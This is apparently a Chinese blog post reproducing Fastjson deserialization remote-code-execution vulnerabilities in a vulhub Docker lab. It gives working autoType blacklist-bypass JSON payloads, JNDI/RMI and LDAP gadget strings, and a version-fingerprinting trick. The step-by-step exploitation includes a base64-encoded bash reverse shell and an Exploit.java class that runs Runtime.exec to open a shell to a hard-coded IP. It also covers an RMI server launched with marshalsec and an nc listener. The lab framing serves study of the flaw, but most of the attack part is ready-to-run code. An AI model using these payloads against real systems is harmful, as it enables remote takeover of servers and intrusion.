Fastjson历史漏洞复现

Fastjson简介

Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串, 支持将 Java
Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean 。

历史漏洞

Fastjson <=1.2.24 反序列化远程命令执行漏洞
Fastjson <=1.2.41 反序列化远程命令执行漏洞
Fastjson <=1.2.42 反序列化远程命令执行漏洞
Fastjson <=1.2.43 反序列化远程命令执行漏洞
Fastjson <=1.2.45 反序列化远程命令执行漏洞
Fastjson <=1.2.47 反序列化远程命令执行漏洞
Fastjson <=1.2.62 反序列化远程命令执行漏洞
Fastjson <=1.2.66 反序列化远程命令执行漏洞

Fastjson < 1.2.41

第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了 autoTypeSupport 属性默认为false,并
且增加了 checkAutoType() 函数,通过黑白名单的方式来防御Fastjson反序列化漏洞,因此后面发现的
Fastjson反序列化漏洞都是针对黑名单绕过来实现攻击利用的目的的。
com.sun.rowset.jdbcRowSetlmpl 在1.2.25版本被加入了黑名单,fastjson有个判断条件判断类名是
否以"L"开头、以";"结尾,是的话就提取出其中的类名在加载进来
那么就可以构造如下exp:
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;", "dataSourceName":"rmi://ip:9999/rce_1_2_24_exploit", "autoCommit":true}

Fastjson < 1.2.42

阿里在发现这个绕过漏洞之后做出了类名如果为L开头,;结尾的时候就先去掉L和;进行黑名单检验的方
法,但是没有考虑到双写或多写的情况,也就是说这种方法只能防御一组L和;,构造exp如下,即双写L
和;
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;", "dataSourceName":"rmi://x.x.x.x:9999/exp", "autoCommit":true}

Fastjson < 1.2.47

在1.2.47版本及以下的情况下,loadClass中默认cache为true,首先使用 java.lang.Class 把获取到的
类缓存到 mapping 中,然后直接从缓存中获取到了 com.sun.rowset.jdbcRowSetlmpl 这个类,即可绕
过黑名单。
{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://ip:9999/exp", "autoCommit": true }}

Fastjson < 1.2.66

基于黑名单绕过, autoTypeSupport 属性为true才能使用,在1.2.25版本之后 autoTypeSupport 默认
为false
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://ip:1389/Calc"} {"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://ip:1389/Calc"} {"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://ip:1389/Calc"}

Fastjson识别

Fastjson的作用是用于对JSON格式的数据进行解析和打包,所以出现json格式的地方就有可能使用了Fastjson。
通过burpsuite抓包查看数据包体中Content-Type是否为application/json。可以进一步使用报错的方式判断是否为fastjson。

Fastjson报错识别

使用burpsuite抓包=>发送Repeater=>在请求头右击选择"Change request method"(更改http请求)=>将Content-type的属性改为application/json =>添加json格式。
可以看到当格式正确时,输出了该内容。
Fastjson历史漏洞复现_第1张图片如果我们构造错误的json格式呢?
Fastjson历史漏洞复现_第2张图片它就会爆出json信息。

也可以通过构造如下的json爆出json版本

[
{
  "a":"a\x] {"@type":"java.lang.AutoCloseable"a

Fastjson历史漏洞复现_第3张图片

Fastjson漏洞发现

原理: java.net.InetAddress 这个类在实例化时会尝试对 example.com 进行域名解析,这时候可以通过 dnslog 的方式得知漏洞是否存在。
Fastjson历史漏洞复现_第4张图片Fastjson历史漏洞复现_第5张图片
可以看到DNS对该域名进行解析,可以判断fastjson漏洞的存在。

Fastjson1.2.47反序列化漏洞(CNVD‐2019‐22238)

漏洞简介

fastjson 在解析 json 的过程中,支持使用 autoType 来实例化某一个具体的类,并调用该类的
set/get 方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
fastjson 于 1.2.24 版本后增加了反序列化白名单,而在 1.2.48 以前的版本中,攻击者可以利用特
殊构造的 json 字符串绕过白名单检测,成功执行任意命令。

影响版本

fastjson<1.2.48

JNDI

JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名
和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
可以访问以下命名/目录服务:
RMI (JAVA远程方法调用)
LDAP (轻量级目录访问协议)
CORBA (公共对象请求代理体系结构)
DNS (域名服务)

JNDI注入 + RMI

RMI是Java远程方法调用,是Java编程语言里,一种用于实现远程过程调用的应用程序编程接口。
它使客户机上运行的程序可以调用远程服务器上的对象。

漏洞复现

  1. docker搭建靶场环境
cd vulhub--master
ls
cd fastjson/
ls
cd 1.2.47-rce/
docker-compose up -d
docker ps

Fastjson历史漏洞复现_第6张图片

  1. 使用浏览器访问靶场地址。(http://ip:port)
    Fastjson历史漏洞复现_第7张图片

方法一:JNDI注入 + RMI

  1. 在攻击机下载利用工具。
 https://toolaffix.oss-cn-beijing.aliyuncs.com/jndi_tool.jar
  1. 反弹shell
    将bash -i >& /dev/tcp/攻击机ip/6666 0>&1进行base64编码。
    在burpsuite中的Decoder模块进行编码。
    Fastjson历史漏洞复现_第8张图片
1.bash -i >& /dev/tcp/攻击机ip/6666 0>&1
2.bash -c {echo,bash -i >& /dev/tcp/攻击机-ip/6666 0>&1的base64编码}|
{base64,-d}|{bash,-i}
3.java -cp fastjson_tool.jar fastjson.HRMIServer 171.16.1.105 9999 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzEuMTYuMS4xMDUvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}"
  1. 利用工具启动RMI server
java -cp fastjson_tool.jar fastjson.HRMIServer 124.71.45.28 9999 "要执行的命令"

在这里插入图片描述

  1. 新打开窗口监听端口。
nc -lnvp 6666

在这里插入图片描述

  1. 构造payload进行攻击,利用JNDI注入加载远程 RMI server 上的字节码(固定格式)
{
   "a":{
       "@type":"java.lang.Class",
       "val":"com.sun.rowset.JdbcRowSetImpl"
   },
   "b":{
       "@type":"com.sun.rowset.JdbcRowSetImpl",
       "dataSourceName":"rmi://攻击机ip:9999/Object",
       "autoCommit":true
   }
}

Fastjson历史漏洞复现_第9张图片

  1. 点击send,返回监听查看结果。
    Fastjson历史漏洞复现_第10张图片

  2. 反弹成功!

方法二:

1.Exploit.java

//javac Exploit.java
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
   public Exploit(){
       try{
           Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >& 
/dev/tcp/47.101.214.85/6666 0>&1");
       }catch(Exception e){
           e.printStackTrace();
       }
   }
   public static void main(String[] argv){
       Exploit e = new Exploit();
   }
}
  1. javac Exploit.java。在单前目录会生成一个Exploit.class的字节码文件
  2. 借助 marshalsec 项目启动一个rmi服务器,监听一个端口,并指定加载远程类 Exploit.class 。
    maven打包项目成jar包:mvn clean package -DskipTests
  3. 开启http服务。
python3 -m http.server

Fastjson历史漏洞复现_第11张图片

  1. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://171.16.1.105:8000/#Exploit” 9999

  2. 开启端口监听。

在这里插入图片描述

  1. 构造payload进行攻击。

Fastjson历史漏洞复现_第12张图片
9.点击send,返回监听查看结果。
Fastjson历史漏洞复现_第13张图片

你可能感兴趣的:(漏洞复现,安全,web安全,系统安全,网络安全)